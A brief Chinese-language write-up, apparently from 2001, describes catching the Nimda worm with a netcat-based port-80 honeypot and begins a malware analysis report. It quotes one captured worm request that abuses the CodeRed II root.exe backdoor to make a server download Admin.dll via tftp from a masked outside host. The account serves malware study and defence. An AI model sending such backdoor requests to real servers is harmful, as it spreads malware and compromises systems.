2001.9.18晚，我习惯性的打开了tcp/80，用这个简单的批处理程序：

-------------cut here-----------
@echo off
:start
nc -vv -w 5 -l -p 80〉〉httpd.log
goto start
--------------------------------

　　通常我用它来监测CodeXXX之类的分布，另外还指望运气好能弄到个把变种。虽然偶尔会收到几个扫描代理服务器的噪声，但一般都是"rcvd 3818"。

　　忽然我发现从某个IP来了连续的几个一百字节左右的数据，打开httpd.log一看原来是是一个http扫描，目的是寻找unicode_hole和CodeRedII建立的root.exe。我没理它，可是在不到5分钟的时间里我连续收到了几个发自不同IP的同种扫描，难道这就是CodeBlue？我开了一个真正的honeypot，不管对方GET什么都回应"200 OK"，结果马上就看到了实质性的东西：

"GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0"

　　好，满足你的要求。运行"tftp -i xxx.xxx.xxx.xxx GET Admin.dll"，结果马上就得到了好东西，赶紧反编译一下看看，然后再……@#$……%^&……总算弄清楚了个大概，先写一个分析报告吧。

尼姆达病毒：
一些反病毒厂商的命名：
Worm.Concept.57344
W32/Nimda.A@mm
W32/Nimda@mm
I-Worm.Nimda

类型：蠕虫/病毒

受影响的系统：Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000

大小：57344字节